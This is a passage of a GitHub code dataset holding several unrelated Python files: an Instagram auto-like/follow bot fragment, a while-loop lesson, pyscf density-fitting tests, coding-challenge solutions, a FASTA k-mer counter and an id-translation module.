driver.find_element_by_xpath('/html/body/div[5]/div[2]/div/article/div[3]/section[1]/span[1]/button/div/span/*[name()=\"svg\"]')\n like_text = like_path.get_attribute('aria-label')\n if like_text == \"좋아요\":\n print(\"좋아요 클릭\")\n like_action.click()\n else:\n print(\"이미 좋아요\")\n\n #############################\n time.sleep(5)\n\n ################################# 팔로우\n\n list_ = []\n\n button_list = driver.find_elements_by_xpath(\"//button\")\n\n for i in button_list:\n list_.append(i.text)\n time.sleep(2)\n\n if list_[1] == '팔로잉':\n bool_following = True\n pass\n else:\n bool_following = False\n follow_btn = driver.find_elements_by_xpath('//div[2]/div[1]/div[2]/button')[0]\n follow_btn.click()\n #######################################\n time.sleep(6)\n\n ###################################### 다음 게시물로 이동\n element_list = driver.find_elements_by_xpath(\"//a\") # 다음 click\n for j in element_list:\n if j.text == '다음':\n count += 1\n bool_ = False\n j.click()\n break\n \n if count == 30:\n exit_button = driver.find_elements_by_xpath(\"//div[5]/div[3]/button\")[0]\n exit_button.click() \n #####################################\n\nwhile True:\n\n like_comment()\n\n","repo_name":"Seongju-Lee/InstagramBot-Crolling","sub_path":"InstaBot.py","file_name":"InstaBot.py","file_ext":"py","file_size_in_byte":5179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70024372212","text":"# Indentation is used to indicate what statements are included inside the While Loop.\r\n\r\n# While Loop (Is a statement that will repeat a block of code as long as its condition is fulfilled.)\r\n# Syntax: while valOne > valTwo # Do Something\r\nage = 12\r\n\r\nwhile age < 18: \r\n print (\"Still Young : \" + str(age))\r\n age = age + 1\r\n \r\n# Else in While Loop (Else is added to the bottom of a while loop so that it can execute code when the loop is done.)\r\n# Syntax: while valOne > valTwo # Do Something else: # Do Something \r\nage = 1\r\n\r\nwhile age < 18:\r\n print (\"Still Young : \" + str(age))\r\n age = age + 1\r\nelse:\r\n print (\"Legal Age : \" + str(age))\r\n\r\n# While Loop in Collections (While Loop can be used to access every item in a Collection (Lists and Tuples) since it is Indexed and Ordered.)\r\n# Example 1\r\n\r\nstudentID = [202100451, 202100452, 202100453, 202100454]\r\ni = 0\r\n\r\nwhile i < 4:\r\n print (studentID[i])\r\n i = i + 1\r\n\r\n# Example 2\r\n\r\nstudentID = [202100451, 202100452, 202100453, 202100454,202100455]\r\ni = 0\r\n\r\nwhile i < len(studentID):\r\n print (studentID[i])\r\n i = i + 1\r\n\r\n# Break Keyword in While Loop (Is used to stop the loop no matter what the condition is. )\r\n# Example \r\n\r\nwhile True:\r\n print (\"Hello Anna!\")\r\n break\r\n\r\n# Conditions in While Loop (You can use any Conditional Statement inside a While Loop.)\r\n# Example 1 \r\n\r\nprint (\"Kumain ka na ba?\")\r\n\r\nwhile True:\r\n answer = input(\"Answer : \")\r\n if answer == \"Yes\":\r\n print (\"Mabuti!\")\r\n break\r\n else: \r\n print (\"Edi kumain ka na!\")\r\n\r\n# Example 2 (You want to sort the Odd and Even Numbers)\r\n# Notes 1. Use Modulo which is %\r\n\r\nnumbers = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\r\n\r\ni = 0\r\n\r\nwhile i < len(numbers):\r\n if (numbers[i] % 2 == 0):\r\n print (\"Even Number : \" + str(numbers[i]))\r\n else:\r\n print (\"Odd Number : \" + str(numbers[i]))\r\n i = i + 1\r\n \r\n# Math Quiz Game\r\nlives = 3\r\ncorrectanswer = 40\r\ncorrectanswer1 = 100\r\n\r\nwhile lives > 0:\r\n answer = int(input (\"20 + 20 = \"))\r\n if answer == correctanswer:\r\n print (\"Congratulations, you won!\")\r\n break\r\n else:\r\n lives = lives - 1\r\nelse:\r\n print (\"You lose, better luck next time!\")\r\n \r\nwhile lives > 0:\r\n answer = int(input (\"60 + 40 = \"))\r\n if answer == correctanswer1:\r\n print (\"Congratulations, you won!\")\r\n break\r\n else:\r\n lives = lives - 1\r\nelse:\r\n print (\"You lose, better luck next time!\") ","repo_name":"itsmeannabanana/python","sub_path":"LESSONS ABOUT WHILE LOOP.py","file_name":"LESSONS ABOUT WHILE LOOP.py","file_ext":"py","file_size_in_byte":2471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2702484777","text":"import unittest\nimport numpy\nimport numpy as np\n\nfrom pyscf.pbc import gto as pgto\nimport pyscf.pbc.dft as pdft\nfrom pyscf.pbc.df import fft, pwdf, mdf\n\n\n\n\n##################################################\n#\n# port from ao2mo/eris.py\n#\n##################################################\nfrom pyscf import lib\nfrom pyscf.pbc import lib as pbclib\nfrom pyscf.pbc.dft.gen_grid import gen_uniform_grids\nfrom pyscf.pbc.dft.numint import eval_ao\nfrom pyscf.pbc import tools\n\n#einsum = np.einsum\neinsum = pbclib.einsum\n\n\"\"\"\n (ij|kl) = \\int dr1 dr2 i*(r1) j(r1) v(r12) k*(r2) l(r2)\n = (ij|G) v(G) (G|kl)\n\n i*(r) j(r) = 1/N \\sum_G e^{iGr} (G|ij)\n = 1/N \\sum_G e^{-iGr} (ij|G)\n\n \"forward\" FFT:\n (G|ij) = \\sum_r e^{-iGr} i*(r) j(r) = fft[ i*(r) j(r) ]\n \"inverse\" FFT:\n (ij|G) = \\sum_r e^{iGr} i*(r) j(r) = N * ifft[ i*(r) j(r) ]\n = conj[ \\sum_r e^{-iGr} j*(r) i(r) ]\n\"\"\"\n\ndef general(cell, mo_coeffs, kpts=None, compact=0):\n '''pyscf-style wrapper to get MO 2-el integrals.'''\n assert len(mo_coeffs) == 4\n if kpts is not None:\n assert len(kpts) == 4\n return get_mo_eri(cell, mo_coeffs, kpts)\n\ndef get_mo_eri(cell, mo_coeffs, kpts=None):\n '''Convenience function to return MO 2-el integrals.'''\n mo_coeff12 = mo_coeffs[:2]\n mo_coeff34 = mo_coeffs[2:]\n if kpts is None:\n kpts12 = kpts34 = q = None\n else:\n kpts12 = kpts[:2]\n kpts34 = kpts[2:]\n q = kpts12[0] - kpts12[1]\n #q = kpts34[1] - kpts34[0]\n if q is None:\n q = np.zeros(3)\n\n mo_pairs12_kG = get_mo_pairs_G(cell, mo_coeff12, kpts12)\n mo_pairs34_invkG = get_mo_pairs_invG(cell, mo_coeff34, kpts34, q)\n return assemble_eri(cell, mo_pairs12_kG, mo_pairs34_invkG, q)\n\ndef get_mo_pairs_G(cell, mo_coeffs, kpts=None, q=None):\n '''Calculate forward (G|ij) FFT of all MO pairs.\n\n TODO: - Implement simplifications for real orbitals.\n\n Args:\n mo_coeff: length-2 list of (nao,nmo) ndarrays\n The two sets of MO coefficients to use in calculating the\n product |ij).\n\n Returns:\n mo_pairs_G : (ngs, nmoi*nmoj) ndarray\n The FFT of the real-space MO pairs.\n '''\n coords = gen_uniform_grids(cell)\n if kpts is None:\n q = np.zeros(3)\n aoR = eval_ao(cell, coords)\n ngs = aoR.shape[0]\n\n if np.array_equal(mo_coeffs[0], mo_coeffs[1]):\n nmoi = nmoj = mo_coeffs[0].shape[1]\n moiR = mojR = einsum('ri,ia->ra', aoR, mo_coeffs[0])\n else:\n nmoi = mo_coeffs[0].shape[1]\n nmoj = mo_coeffs[1].shape[1]\n moiR = einsum('ri,ia->ra', aoR, mo_coeffs[0])\n mojR = einsum('ri,ia->ra', aoR, mo_coeffs[1])\n\n else:\n if q is None:\n q = kpts[1]-kpts[0]\n aoR_ki = eval_ao(cell, coords, kpt=kpts[0])\n aoR_kj = eval_ao(cell, coords, kpt=kpts[1])\n ngs = aoR_ki.shape[0]\n\n nmoi = mo_coeffs[0].shape[1]\n nmoj = mo_coeffs[1].shape[1]\n moiR = einsum('ri,ia->ra', aoR_ki, mo_coeffs[0])\n mojR = einsum('ri,ia->ra', aoR_kj, mo_coeffs[1])\n\n #mo_pairs_R = einsum('ri,rj->rij', np.conj(moiR), mojR)\n mo_pairs_G = np.zeros([ngs,nmoi*nmoj], np.complex128)\n\n fac = np.exp(-1j*np.dot(coords, q))\n for i in xrange(nmoi):\n for j in xrange(nmoj):\n mo_pairs_R_ij = np.conj(moiR[:,i])*mojR[:,j]\n mo_pairs_G[:,i*nmoj+j] = tools.fftk(mo_pairs_R_ij, cell.gs, fac)\n\n return mo_pairs_G\n\ndef get_mo_pairs_invG(cell, mo_coeffs, kpts=None, q=None):\n '''Calculate \"inverse\" (ij|G) FFT of all MO pairs.\n\n TODO: - Implement simplifications for real orbitals.\n\n Args:\n mo_coeff: length-2 list of (nao,nmo) ndarrays\n The two sets of MO coefficients to use in calculating the\n product |ij).\n\n Returns:\n mo_pairs_invG : (ngs, nmoi*nmoj) ndarray\n The inverse FFTs of the real-space MO pairs.\n '''\n coords = gen_uniform_grids(cell)\n if kpts is None:\n q = np.zeros(3)\n aoR = eval_ao(cell, coords)\n ngs = aoR.shape[0]\n\n if np.array_equal(mo_coeffs[0], mo_coeffs[1]):\n nmoi = nmoj = mo_coeffs[0].shape[1]\n moiR = mojR = einsum('ri,ia->ra', aoR, mo_coeffs[0])\n else:\n nmoi = mo_coeffs[0].shape[1]\n nmoj = mo_coeffs[1].shape[1]\n moiR = einsum('ri,ia->ra', aoR, mo_coeffs[0])\n mojR = einsum('ri,ia->ra', aoR, mo_coeffs[1])\n\n else:\n if q is None:\n q = kpts[1]-kpts[0]\n aoR_ki = eval_ao(cell, coords, kpt=kpts[0])\n aoR_kj = eval_ao(cell, coords, kpt=kpts[1])\n ngs = aoR_ki.shape[0]\n\n nmoi = mo_coeffs[0].shape[1]\n nmoj = mo_coeffs[1].shape[1]\n moiR = einsum('ri,ia->ra', aoR_ki, mo_coeffs[0])\n mojR = einsum('ri,ia->ra', aoR_kj, mo_coeffs[1])\n\n #mo_pairs_R = einsum('ri,rj->rij', np.conj(moiR), mojR)\n mo_pairs_invG = np.zeros([ngs,nmoi*nmoj], np.complex128)\n\n fac = np.exp(1j*np.dot(coords, q))\n for i in xrange(nmoi):\n for j in xrange(nmoj):\n mo_pairs_R_ij = np.conj(moiR[:,i])*mojR[:,j]\n mo_pairs_invG[:,i*nmoj+j] = np.conj(tools.fftk(np.conj(mo_pairs_R_ij), cell.gs, fac))\n\n return mo_pairs_invG\n\ndef get_mo_pairs_G_old(cell, mo_coeffs, kpts=None, q=None):\n '''Calculate forward (G|ij) and \"inverse\" (ij|G) FFT of all MO pairs.\n\n TODO: - Implement simplifications for real orbitals.\n\n Args:\n mo_coeff: length-2 list of (nao,nmo) ndarrays\n The two sets of MO coefficients to use in calculating the\n product |ij).\n\n Returns:\n mo_pairs_G, mo_pairs_invG : (ngs, nmoi*nmoj) ndarray\n The FFTs of the real-space MO pairs.\n '''\n coords = gen_uniform_grids(cell)\n if kpts is None:\n q = np.zeros(3)\n aoR = eval_ao(cell, coords)\n ngs = aoR.shape[0]\n\n if np.array_equal(mo_coeffs[0], mo_coeffs[1]):\n nmoi = nmoj = mo_coeffs[0].shape[1]\n moiR = mojR = einsum('ri,ia->ra', aoR, mo_coeffs[0])\n else:\n nmoi = mo_coeffs[0].shape[1]\n nmoj = mo_coeffs[1].shape[1]\n moiR = einsum('ri,ia->ra', aoR, mo_coeffs[0])\n mojR = einsum('ri,ia->ra', aoR, mo_coeffs[1])\n\n else:\n if q is None:\n q = kpts[1]-kpts[0]\n aoR_ki = eval_ao(cell, coords, kpt=kpts[0])\n aoR_kj = eval_ao(cell, coords, kpt=kpts[1])\n ngs = aoR_ki.shape[0]\n\n nmoi = mo_coeffs[0].shape[1]\n nmoj = mo_coeffs[1].shape[1]\n moiR = einsum('ri,ia->ra', aoR_ki, mo_coeffs[0])\n mojR = einsum('ri,ia->ra', aoR_kj, mo_coeffs[1])\n\n mo_pairs_R = np.einsum('ri,rj->rij', np.conj(moiR), mojR)\n mo_pairs_G = np.zeros([ngs,nmoi*nmoj], np.complex128)\n mo_pairs_invG = np.zeros([ngs,nmoi*nmoj], np.complex128)\n\n fac = np.exp(-1j*np.dot(coords, q))\n for i in xrange(nmoi):\n for j in xrange(nmoj):\n mo_pairs_G[:,i*nmoj+j] = tools.fftk(mo_pairs_R[:,i,j], cell.gs, fac)\n mo_pairs_invG[:,i*nmoj+j] = np.conj(tools.fftk(np.conj(mo_pairs_R[:,i,j]), cell.gs,\n fac.conj()))\n\n return mo_pairs_G, mo_pairs_invG\n\ndef assemble_eri(cell, orb_pair_invG1, orb_pair_G2, q=None):\n '''Assemble 4-index electron repulsion integrals.\n\n Returns:\n (nmo1*nmo2, nmo3*nmo4) ndarray\n\n '''\n if q is None:\n q = np.zeros(3)\n\n coulqG = tools.get_coulG(cell, -1.0*q)\n ngs = orb_pair_invG1.shape[0]\n Jorb_pair_G2 = np.einsum('g,gn->gn',coulqG,orb_pair_G2)*(cell.vol/ngs**2)\n eri = np.dot(orb_pair_invG1.T, Jorb_pair_G2)\n return eri\n\ndef get_ao_pairs_G(cell, kpt=np.zeros(3)):\n '''Calculate forward (G|ij) and \"inverse\" (ij|G) FFT of all AO pairs.\n\n Args:\n cell : instance of :class:`Cell`\n\n Returns:\n ao_pairs_G, ao_pairs_invG : (ngs, nao*(nao+1)/2) ndarray\n The FFTs of the real-space AO pairs.\n\n '''\n coords = gen_uniform_grids(cell)\n aoR = eval_ao(cell, coords, kpt) # shape = (coords, nao)\n ngs, nao = aoR.shape\n gamma_point = abs(kpt).sum() < 1e-9\n if gamma_point:\n npair = nao*(nao+1)//2\n ao_pairs_G = np.empty([ngs, npair], np.complex128)\n\n ij = 0\n for i in range(nao):\n for j in range(i+1):\n ao_ij_R = np.conj(aoR[:,i]) * aoR[:,j]\n ao_pairs_G[:,ij] = tools.fft(ao_ij_R, cell.gs)\n #ao_pairs_invG[:,ij] = ngs*tools.ifft(ao_ij_R, cell.gs)\n ij += 1\n ao_pairs_invG = ao_pairs_G.conj()\n else:\n ao_pairs_G = np.zeros([ngs, nao,nao], np.complex128)\n for i in range(nao):\n for j in range(nao):\n ao_ij_R = np.conj(aoR[:,i]) * aoR[:,j]\n ao_pairs_G[:,i,j] = tools.fft(ao_ij_R, cell.gs)\n ao_pairs_invG = ao_pairs_G.transpose(0,2,1).conj().reshape(-1,nao**2)\n ao_pairs_G = ao_pairs_G.reshape(-1,nao**2)\n return ao_pairs_G, ao_pairs_invG\n\ndef get_ao_eri(cell, kpt=np.zeros(3)):\n '''Convenience function to return AO 2-el integrals.'''\n\n ao_pairs_G, ao_pairs_invG = get_ao_pairs_G(cell, kpt)\n eri = assemble_eri(cell, ao_pairs_invG, ao_pairs_G)\n if abs(kpt).sum() < 1e-9:\n eri = eri.real\n return eri\n\n##################################################\n#\n# ao2mo/eris.py end\n#\n##################################################\n\n\n\n\ncell = pgto.Cell()\ncell.atom = 'He 1. .5 .5; C .1 1.3 2.1'\ncell.basis = {'He': [(0, (2.5, 1)), (0, (1., 1))],\n 'C' :'gth-szv',}\ncell.pseudo = {'C':'gth-pade'}\ncell.h = np.eye(3) * 2.5\ncell.gs = [10] * 3\ncell.build()\nnp.random.seed(1)\nkpts = np.random.random((4,3))\nkpts[3] = kpts[0]-kpts[1]+kpts[2]\nkpt0 = np.zeros(3)\n\ncell1 = pgto.Cell()\ncell1.atom = 'He 1. .5 .5; He .1 1.3 2.1'\ncell1.basis = {'He': [(0, (2.5, 1)), (0, (1., 1))]}\ncell1.h = np.eye(3) * 2.5\ncell1.gs = [10] * 3\ncell1.build()\nkdf0 = mdf.MDF(cell1)\nkdf0.kpts = kpts\n\n\ndef finger(a):\n w = np.cos(np.arange(a.size))\n return np.dot(w, a.ravel())\n\nclass KnowValues(unittest.TestCase):\n def test_pwdf_get_nuc(self):\n v0 = fft.DF(cell).get_nuc(kpts[0])\n df = pwdf.PWDF(cell)\n v1 = df.get_nuc(kpts[0])\n self.assertTrue(np.allclose(v0, v1, atol=1e-4, rtol=1e-4))\n self.assertAlmostEqual(finger(v1), (-5.7646030917912663+0.19126291999423831j), 8)\n\n def test_pwdf_get_pp(self):\n v0 = pgto.pseudo.get_pp(cell, kpts[0])\n v1 = pwdf.PWDF(cell).get_pp(kpts)\n self.assertTrue(np.allclose(v0, v1[0], atol=1e-6, rtol=1e-6))\n self.assertAlmostEqual(finger(v1[0]), (-5.6240249381230019+0.22094834207065794j), 8)\n\n v0 = pgto.pseudo.get_pp(cell, kpts[1])\n self.assertTrue(np.allclose(v0, v1[1], atol=1e-6, rtol=1e-6))\n self.assertAlmostEqual(finger(v1[1]), (-5.53877028746+1.04393337137j) , 8)\n self.assertAlmostEqual(finger(v1[2]), (-6.05309001635+0.281728966125j), 8)\n self.assertAlmostEqual(finger(v1[3]), (-5.60115438406+0.275973062578j), 8)\n\n def test_pwdf_get_ao_eri(self):\n df0 = fft.DF(cell)\n df = pwdf.PWDF(cell)\n eri0 = df0.get_ao_eri(compact=True)\n eri1 = df.get_ao_eri(compact=True)\n self.assertTrue(np.allclose(eri0, eri1, atol=1e-5, rtol=1e-5))\n self.assertAlmostEqual(finger(eri1), 0.80425361966560172, 8)\n\n eri0 = df0.get_ao_eri(kpts[0])\n eri1 = df.get_ao_eri(kpts[0])\n self.assertTrue(np.allclose(eri0, eri1, atol=1e-5, rtol=1e-5))\n self.assertAlmostEqual(finger(eri1), (2.9346374476387949-0.20479054936779137j), 8)\n\n eri0 = df0.get_ao_eri(kpts)\n eri1 = df.get_ao_eri(kpts)\n self.assertTrue(np.allclose(eri0, eri1, atol=1e-5, rtol=1e-5))\n self.assertAlmostEqual(finger(eri1), (0.33709287302019619-0.94185725020966538j), 8)\n\n def test_get_eri_gamma(self):\n odf0 = mdf.MDF(cell1)\n odf = pwdf.PWDF(cell1)\n ref = odf0.get_eri()\n eri0000 = odf.get_eri(compact=True)\n self.assertTrue(eri0000.dtype == numpy.double)\n self.assertTrue(np.allclose(eri0000, ref, atol=1e-6, rtol=1e-6))\n self.assertAlmostEqual(finger(eri0000), 0.23714016293926865, 9)\n\n ref = kdf0.get_eri((kpts[0],kpts[0],kpts[0],kpts[0]))\n eri1111 = odf.get_eri((kpts[0],kpts[0],kpts[0],kpts[0]))\n self.assertTrue(np.allclose(eri1111, ref, atol=1e-6, rtol=1e-6))\n self.assertAlmostEqual(finger(eri1111), (1.2410388899583582-5.2370501878355006e-06j), 9)\n\n eri1111 = odf.get_eri((kpts[0]+1e-8,kpts[0]+1e-8,kpts[0],kpts[0]))\n self.assertTrue(np.allclose(eri1111, ref, atol=1e-6, rtol=1e-6))\n self.assertAlmostEqual(finger(eri1111), (1.2410388899583582-5.2370501878355006e-06j), 9)\n\n def test_get_eri_0011(self):\n odf = pwdf.PWDF(cell1)\n ref = kdf0.get_eri((kpts[0],kpts[0],kpts[1],kpts[1]))\n eri0011 = odf.get_eri((kpts[0],kpts[0],kpts[1],kpts[1]))\n self.assertTrue(np.allclose(eri0011, ref, atol=1e-3, rtol=1e-3))\n self.assertAlmostEqual(finger(eri0011), (1.2410162858084512+0.00074485383749912936j), 9)\n\n ref = fft.DF(cell1).get_mo_eri([numpy.eye(cell1.nao_nr())]*4, (kpts[0],kpts[0],kpts[1],kpts[1]))\n eri0011 = odf.get_eri((kpts[0],kpts[0],kpts[1],kpts[1]))\n self.assertTrue(np.allclose(eri0011, ref, atol=1e-9, rtol=1e-9))\n self.assertAlmostEqual(finger(eri0011), (1.2410162860852818+0.00074485383748954838j), 9)\n\n def test_get_eri_0110(self):\n odf = pwdf.PWDF(cell1)\n ref = kdf0.get_eri((kpts[0],kpts[1],kpts[1],kpts[0]))\n eri0110 = odf.get_eri((kpts[0],kpts[1],kpts[1],kpts[0]))\n self.assertTrue(np.allclose(eri0110, ref, atol=1e-6, rtol=1e-6))\n eri0110 = odf.get_eri((kpts[0]+1e-8,kpts[1]+1e-8,kpts[1],kpts[0]))\n self.assertTrue(np.allclose(eri0110, ref, atol=1e-6, rtol=1e-6))\n self.assertAlmostEqual(finger(eri0110), (1.2928399254827956-0.011820590601969154j), 9)\n\n ref = fft.DF(cell1).get_mo_eri([numpy.eye(cell1.nao_nr())]*4, (kpts[0],kpts[1],kpts[1],kpts[0]))\n eri0110 = odf.get_eri((kpts[0],kpts[1],kpts[1],kpts[0]))\n self.assertTrue(np.allclose(eri0110, ref, atol=1e-9, rtol=1e-9))\n self.assertAlmostEqual(finger(eri0110), (1.2928399254827956-0.011820590601969154j), 9)\n eri0110 = odf.get_eri((kpts[0]+1e-8,kpts[1]+1e-8,kpts[1],kpts[0]))\n self.assertTrue(np.allclose(eri0110, ref, atol=1e-9, rtol=1e-9))\n self.assertAlmostEqual(finger(eri0110), (1.2928399254827956-0.011820590601969154j), 9)\n\n def test_get_eri_0123(self):\n odf = pwdf.PWDF(cell1)\n ref = kdf0.get_eri(kpts)\n eri1111 = odf.get_eri(kpts)\n self.assertTrue(np.allclose(eri1111, ref, atol=1e-8, rtol=1e-8))\n self.assertAlmostEqual(finger(eri1111), (1.2917759427391706-0.013340252488069412j), 9)\n\n ref = fft.DF(cell1).get_mo_eri([numpy.eye(cell1.nao_nr())]*4, kpts)\n self.assertTrue(np.allclose(eri1111, ref, atol=1e-8, rtol=1e-8))\n\n def test_get_mo_eri(self):\n df0 = fft.DF(cell)\n odf = pwdf.PWDF(cell)\n nao = cell.nao_nr()\n numpy.random.seed(5)\n mo =(numpy.random.random((nao,nao)) +\n numpy.random.random((nao,nao))*1j)\n eri_mo0 = df0.get_mo_eri((mo,)*4, kpts)\n eri_mo1 = odf.get_mo_eri((mo,)*4, kpts)\n self.assertTrue(np.allclose(eri_mo1, eri_mo0, atol=1e-7, rtol=1e-7))\n\n kpts_t = (kpts[2],kpts[3],kpts[0],kpts[1])\n eri_mo2 = df0.get_mo_eri((mo,)*4, kpts_t)\n eri_mo2 = eri_mo2.reshape((nao,)*4).transpose(2,3,0,1).reshape(nao**2,-1)\n self.assertTrue(np.allclose(eri_mo2, eri_mo0, atol=1e-7, rtol=1e-7))\n\n eri_mo0 = df0.get_mo_eri((mo,)*4, (kpts[0],)*4)\n eri_mo1 = odf.get_mo_eri((mo,)*4, (kpts[0],)*4)\n self.assertTrue(np.allclose(eri_mo1, eri_mo0, atol=1e-7, rtol=1e-7))\n\n eri_mo0 = df0.get_mo_eri((mo,)*4, (kpts[0],kpts[1],kpts[1],kpts[0],))\n eri_mo1 = odf.get_mo_eri((mo,)*4, (kpts[0],kpts[1],kpts[1],kpts[0],))\n self.assertTrue(np.allclose(eri_mo1, eri_mo0, atol=1e-7, rtol=1e-7))\n\n eri_mo0 = df0.get_mo_eri((mo,)*4, (kpt0,kpt0,kpts[0],kpts[0],))\n eri_mo1 = odf.get_mo_eri((mo,)*4, (kpt0,kpt0,kpts[0],kpts[0],))\n self.assertTrue(np.allclose(eri_mo1, eri_mo0, atol=1e-7, rtol=1e-7))\n\n eri_mo0 = df0.get_mo_eri((mo,)*4, (kpts[0],kpts[0],kpt0,kpt0,))\n eri_mo1 = odf.get_mo_eri((mo,)*4, (kpts[0],kpts[0],kpt0,kpt0,))\n self.assertTrue(np.allclose(eri_mo1, eri_mo0, atol=1e-7, rtol=1e-7))\n\n mo1 = mo[:,:nao//2+1]\n eri_mo0 = df0.get_mo_eri((mo1,mo,mo,mo1), (kpts[0],)*4)\n eri_mo1 = odf.get_mo_eri((mo1,mo,mo,mo1), (kpts[0],)*4)\n self.assertTrue(np.allclose(eri_mo1, eri_mo0, atol=1e-7, rtol=1e-7))\n\n eri_mo0 = df0.get_mo_eri((mo1,mo,mo1,mo), (kpts[0],kpts[1],kpts[1],kpts[0],))\n eri_mo1 = odf.get_mo_eri((mo1,mo,mo1,mo), (kpts[0],kpts[1],kpts[1],kpts[0],))\n self.assertTrue(np.allclose(eri_mo1, eri_mo0, atol=1e-7, rtol=1e-7))\n\n\nif __name__ == '__main__':\n print(\"Full Tests for pwdf\")\n unittest.main()\n\n","repo_name":"sunchong137/pyscf_2017","sub_path":"pbc/df/test/test_pwdf.py","file_name":"test_pwdf.py","file_ext":"py","file_size_in_byte":17110,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"8433882160","text":"# https://school.programmers.co.kr/learn/courses/30/lessons/118666\ndef solution(survey, choices):\n res = ''\n score = {'R' : 0, 'T' :0, 'C' : 0, 'F' : 0, 'J' : 0, 'M' : 0, 'A' : 0, 'N' : 0}\n for survey, choice in zip(survey, choices):\n if choice > 4:\n score[survey[1]] += choice - 4\n elif choice < 4:\n score[survey[0]] += 4-choice\n if score['R'] >= score['T']:\n res += 'R'\n else:\n res += 'T'\n if score['C'] >= score['F']:\n res += 'C'\n else:\n res += 'F'\n if score['J'] >= score['M']:\n res += 'J'\n else:\n res += 'M'\n if score['A'] >= score['N']:\n res += 'A'\n else:\n res += 'N'\n return res","repo_name":"ha2hi/Python","sub_path":"코딩테스트/프로그래머스/Lv.1/성격 유형 검사하기.py","file_name":"성격 유형 검사하기.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8813298502","text":"'''\nOverview:\n\n\tGiven an integer array nums, find the contiguous subarray within an array (containing at least one number) which has the largest product.\n\nSolution:\n\n\tEnhanced DP:\n\n\t\tdp_i is used to record 2 values: min and max product end with i\n\n\t\tdp_i_min = min(dp_i-1_min * num_i, num_i)\n\t\tdp_i_max = max(dp_i-1_max * num_i, num_i)\n\n\tThis is because multiply with negative number will exchange the value of min and max.\n'''\n\nclass Solution2:\n def maxProduct(self, nums: List[int]) -> int:\n min_ = max_ = out = nums[0]\n for a in nums[1:]:\n if a < 0:\n min_, max_ = max_, min_\n min_, max_ = min(a, min_*a), max(a, max_*a)\n out = max(max_, out)\n return out","repo_name":"SamuelGYX/leetcode_records","sub_path":"souce/152 Maximum Product Subarray.py","file_name":"152 Maximum Product Subarray.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22463095561","text":"# 61kmers.py\n\n# Make a program that reports the kmer counts for a fasta file\n# Your program should take 2 arguments:\n# 1. The file name\n# 2. The size of k\n\n# Hint: use argparse\n# Hint: use mcb185.read_fasta()\n\nimport argparse\nimport mcb185\n\nparser = argparse.ArgumentParser(description=\"Fasta file Kmer counts\")\nparser.add_argument('file', type=str, metavar='', help='input')\nparser.add_argument('k', type=int, metavar='', help='Size of Kmer')\n\narg = parser.parse_args()\n\nkmers = {}\n\nfor name, seq in mcb185.read_fasta(arg.file):\n\tfor i in range(0, len(seq) - arg.k + 1):\n\t\tentry = seq[i:i+arg.k]\n\t\tif entry not in kmers:\n\t\t\tkmers[entry] = 1\n\t\telse:\n\t\t\tkmers[entry] += 1\n\nformatting = list(kmers.keys())\nformatting.sort()\n\nfor i in formatting:\n\tprint(i, kmers[i])\n\n\"\"\"\npython3 60kmers.py ~/DATA/E.coli/GCF_000005845.2_ASM584v2_genomic.fna.gz 2\nAA 338006\nAC 256773\nAG 238013\nAT 309950\nCA 325327\nCC 271821\nCG 346793\nCT 236149\nGA 267384\nGC 384102\nGG 270252\nGT 255699\nTA 212024\nTC 267395\nTG 322379\nTT 339584\n\"\"\"\n","repo_name":"mlee117/homework","sub_path":"61kmers.py","file_name":"61kmers.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16027249134","text":"# 회장 뽑기, G5, BFS\n\nfrom sys import stdin\nfrom collections import deque\n\nn = int(stdin.readline())\ngraph = [[] for _ in range(n+1)]\n\nwhile 1:\n a, b = map(int, stdin.readline().split())\n if a==b==-1:\n break\n graph[a].append(b)\n graph[b].append(a)\n\ndef bfs(s):\n q = deque([s])\n visited[s] = 0\n\n while q:\n x = q.popleft()\n for v in graph[x]:\n if visited[v] == -1:\n visited[v] = visited[x] + 1\n q.append(v)\n\nnum = 51\nres = []\nfor i in range(1, n+1):\n visited=[-1]*(n+1)\n bfs(i)\n tmp = max(visited[1:])\n if tmp == num:\n res.append(i)\n elif tmp < num:\n res = [i]\n num = tmp\n\nprint(num, len(res))\nprint(*res)\n\n\n","repo_name":"lookinmin/CodingTest","sub_path":"그래프/BOJ_2660.py","file_name":"BOJ_2660.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20118443058","text":"from typing import Any, Dict, List, Sequence\nfrom uuid import UUID\n\nfrom ..offline import TranslationMap\nfrom ..types import IdType, NameType, SourceType\nfrom . import DataStructureIO\nfrom .exceptions import NotInplaceTranslatableError\n\n\nclass SingleValueIO(DataStructureIO):\n \"\"\"Implementation for non-iterables. And strings.\"\"\"\n\n @staticmethod\n def handles_type(arg: Any) -> bool:\n return isinstance(arg, (int, str, UUID))\n\n @staticmethod\n def extract(translatable: IdType, names: List[NameType]) -> Dict[NameType, Sequence[IdType]]:\n if len(names) != 1: # pragma: no cover\n raise ValueError(\"Length of names must be one.\")\n\n return {names[0]: (translatable,)}\n\n @staticmethod\n def insert(\n translatable: IdType, names: List[NameType], tmap: TranslationMap[NameType, SourceType, IdType], copy: bool\n ) -> str:\n if not copy: # pragma: no cover\n raise NotInplaceTranslatableError(translatable)\n\n return tmap[names[0]][translatable]\n","repo_name":"rsundqvist/id-translation","sub_path":"src/id_translation/dio/_single_value.py","file_name":"_single_value.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74885212533","text":"from fractions import Fraction #included in challenge\nfrom functools import reduce #included in challenge\n\ndef product(fracs):\n t = reduce(lambda x, y: x*y, fracs) #task was to write single line reduce function so that it is valid for test cases\n return t.numerator, t.denominator\n \n#test cases by HackerRank\nif __name__ == '__main__':\n fracs = []\n for _ in range(int(input())):\n 